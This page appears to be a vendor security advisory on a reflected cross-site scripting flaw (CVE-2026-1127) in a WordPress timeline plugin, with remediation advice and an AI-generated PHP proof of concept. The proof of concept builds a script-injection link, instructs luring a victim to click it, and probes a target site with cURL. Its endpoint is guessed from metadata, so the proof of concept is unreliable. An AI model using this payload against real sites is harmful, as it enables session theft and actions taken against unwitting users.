Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1127: Timeline Event History <= 3.2 – Reflected Cross-Site Scripting (timeline-event-history)

CVE ID CVE-2026-1127
Plugin timeline-event-history
Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 3.2
Patched Version
Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1127 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the WordPress Timeline Event History plugin, affecting all versions up to and including 3.2. The vulnerability originates from insufficient sanitization and escaping of the `id` parameter. An unauthenticated attacker can exploit this to inject arbitrary JavaScript, which executes in the victim’s browser context when they visit a specially crafted link. The CVSS score of 6.1 (Medium) reflects the attack’s network-based nature, low complexity, and requirement for user interaction, with scope changes to the victim’s browser session.

Atomic Edge research identifies the root cause as CWE-79, Improper Neutralization of Input During Web Page Generation. The vulnerability description explicitly cites insufficient input sanitization and output escaping on the `id` parameter. Without access to the patched code, Atomic Edge analysis infers the vulnerable code likely echoes the unsanitized `id` GET or POST parameter directly into the server’s HTML response. This is a common pattern in WordPress plugins where user input is not passed through functions like `esc_attr()` or `esc_html()` before being rendered.

Exploitation requires an attacker to trick a user into clicking a link containing a malicious JavaScript payload within the `id` parameter. The exact endpoint is not specified in the metadata. However, based on WordPress plugin conventions and the public nature of the parameter, Atomic Edge research assesses the attack vector is likely a public-facing page or shortcode handler provided by the plugin. A realistic attack URL would be `https://target.site/?id=payload` or `https://target.site/page-with-plugin-shortcode/?id=payload`. The payload would be a standard XSS vector like `alert(document.domain)` or a more stealthy variant using event handlers.

Remediation requires implementing proper output escaping or context-appropriate sanitization. The fix should ensure all instances where the `id` parameter is output are wrapped in WordPress escaping functions. For HTML attribute contexts, `esc_attr()` is required. For HTML body contexts, `esc_html()` is necessary. Input validation, such as ensuring the `id` is an integer, could provide a secondary layer of defense, but output escaping is the primary and mandatory corrective action for this CWE.

Successful exploitation leads to limited confidentiality and integrity impacts within the victim’s browser session. The injected script executes with the privileges of the current page, allowing an attacker to steal session cookies, perform actions on behalf of the user, or deface the website. The impact is constrained to the user who clicks the malicious link and does not permit direct privilege escalation or remote code execution on the server.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1127 - Timeline Event History <= 3.2 - Reflected Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2026-1127.
 * This script generates a malicious link targeting the vulnerable 'id' parameter.
 * The exact endpoint is unknown; this PoC assumes the parameter is accepted on a public page.
 * User interaction (clicking the link) is required for exploitation.
 */

$target_url = 'https://victim-site.com/'; // CHANGE THIS to the target WordPress site URL.

// A basic XSS payload to demonstrate proof-of-concept.
// In a real attack, this would be obfuscated and could steal cookies or perform actions.
$xss_payload = rawurlencode('<script>alert("XSS via CVE-2026-1127: "+document.domain)</script>');

// Construct the malicious URL.
// Assumption: The 'id' parameter is processed on a page rendered by the plugin.
// This could be a dedicated plugin page or a page containing the plugin's shortcode.
$exploit_url = $target_url . '?id=' . $xss_payload;

// Alternative: Target a specific page/post if the plugin uses a shortcode.
// $exploit_url = $target_url . '/some-page/?id=' . $xss_payload;

echo "Atomic Edge CVE-2026-1127 Proof of Conceptn";
echo "==========================================n";
echo "Target: $target_urln";
echo "Generated Exploit URL:n";
echo $exploit_url . "nn";
echo "Instructions: Lure a victim user to click the above link.n";
echo "The JavaScript alert will execute in their browser if the site is vulnerable.n";

// Optional: Use cURL to perform a test request and check for unsanitized reflection.
// This only confirms parameter reflection, not successful script execution.
echo "n[+] Performing basic reflection test...n";
$ch = curl_init();
$test_payload = rawurlencode('TEST_ID_PARAM');
$test_url = $target_url . '?id=' . $test_payload;
curl_setopt($ch, CURLOPT_URL, $test_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if (strpos($response, 'TEST_ID_PARAM') !== false) {
    echo "  -> The 'id' parameter value is reflected in the response.n";
    echo "  -> Site may be vulnerable. Manual verification with script payload required.n";
} else {
    echo "  -> No clear reflection of the test parameter found.n";
    echo "  -> The vulnerable endpoint may be different.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School